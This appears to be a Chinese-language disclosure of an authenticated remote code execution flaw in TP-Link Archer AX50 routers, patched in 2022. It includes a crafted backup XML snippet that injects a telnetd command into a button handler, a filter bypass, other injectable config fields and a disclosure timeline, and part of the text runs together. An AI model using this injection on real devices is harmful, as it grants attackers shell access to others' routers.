TP-Link路由器中的认证远程代码执行
如果你的TP-Link路由器具有备份和恢复功能,且固件版本早于2022年6月,则很可能存在漏洞
TP-Link Archer AX50,其他tplink路由器可能使用不同格式的备份,需要修改漏洞利用代码
使用漏洞在路由器上启动telnet守护进程

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler,但可以通过更改父XML节点的名称(例如 name="exploit")轻松绕过system.button.handler 来实现,还可以使用 ddns.service.ip_script、firewall.include.path、uhttpd.main 等.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - 发现漏洞
15.03.2022 - 联系TP-Link支持
16.03.2022 - 收到TP-Link回复
02.05.2022 - 分配CVE编号
27.05.2022 - TP-Link发布修复漏洞的固件
07.06.2022 - 公开技术细节